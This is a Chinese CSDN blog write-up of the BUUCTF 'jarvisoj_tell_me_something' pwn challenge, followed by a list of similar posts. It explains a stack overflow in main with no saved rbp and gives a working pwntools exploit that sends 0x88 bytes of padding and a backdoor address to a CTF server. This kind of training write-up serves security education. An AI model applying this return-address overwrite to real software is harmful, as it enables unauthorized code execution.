[BUUCTF]PWN——jarvisoj_tell_me_something

最新推荐文章于 2023-04-17 15:54:55 发布
最新推荐文章于 2023-04-17 15:54:55 发布
阅读量278 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109456456
版权

jarvisoj_tell_me_something

附件

步骤:

  1. 例行检查,64位程序,开启了NX保护
    在这里插入图片描述
  2. 运行一下程序,看看程序的大概流程
    在这里插入图片描述
  3. 64位ida载入,shift+f12检索程序里的字符串
    在这里插入图片描述
    看到了flag.txt关键子,双击跟进,找到了程序里的后门,flag_addr=0x400620
    在这里插入图片描述
  4. 从main函数开始看程序
    在这里插入图片描述
    输入点的v4明显的溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag

这边有一个注意点
在这里插入图片描述
看汇编发现这个程序的结尾处跟平常函数的结尾不一样没有leave
在这里插入图片描述
这道题起步刚开始就直接是rsp减去0x88,其实这里是没有把rbp压入栈的,所以我们只需要0x88的数据大小,就可以开始覆盖返回地址了。

exp

from pwn import *

r=remote('node3.buuoj.cn',27864)
flag_addr=0x400620

payload='a'*(0x88)+p64(flag_addr)
r.sendline(payload)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 796
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_tell_me_something
m0sway的博客
11-23 435
jarvisoj_tell_me_something 使用checksec查看: 看来又是一道栈溢出的题目,直接放IDA查看: 一眼看过去,main()函数中就已经存在栈溢出了 查看字符串可以发现,存在一个flag.txt的字符串,跟进函数查看: 这个函数读取并打印了flag,so…我们只需要return到这个函数即可 需要注意的是: 函数起始的时候并没有将rbp压入栈中,结束的时候也没有leave 所以我们在ret的时候不需要加上偏移,直接在0x88后面加上要ret的函数的地址 exp: from
BUUCTFjarvisoj_tell_me_something(write up)
qq_44768749的博客
08-24 446
BUUCTFjarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 仅开启了栈不可执行保护 0x02 运行 只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路 是一道简单的栈溢出题,知道覆盖长度即可,gdb调试 发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python
jarvisoj_tell_me_something【BUUCTF
qq_41696518的博客
09-03 191
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置。
buuctf jarvisoj_tell_me_something
carol2358的博客
05-04 200
水题,栈溢出返回到good_game就行了,要注意这题没有bp from pwn import * from LibcSearcher import * local_file = './guestbook' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select ...
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 547
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
Jarvis OJ Tell Me Something
九层台
04-05 568
nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料: python zio模块。 拿到程序名字太长了,改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...
[Jarvis OJ - PWN]——Tell Me Something
Y_peak的博客
02-02 287
[Jarvis OJ - PWN]——Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目:
Buuctf(pwn) jarvisoj_tell_me_something 栈溢出
半岛铁盒的博客
08-15 156
64位程序,开启了NX保护 400620 from pwn import * r=remote('node4.buuoj.cn',29273) flag_addr=0x400620 payload='a'*(0x88)+p64(flag_addr) r.sendline(payload) r.interactive() 这道题需要注意的一点是没有返回 这是其栈结构 所以这道题直接溢出0x88即可 ...
BUUCTF-jarvisoj_tell_me_something
Rt1Text的博客
11-07 112
read有栈溢出flag.txt进行栈溢出将返回地址覆盖为fopen函数地址。
BUUCTF pwn——jarvisoj_tell_me_something
CNS-Enterprise BCC-1701-J
04-17 152
BUUCTF 做题练习
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值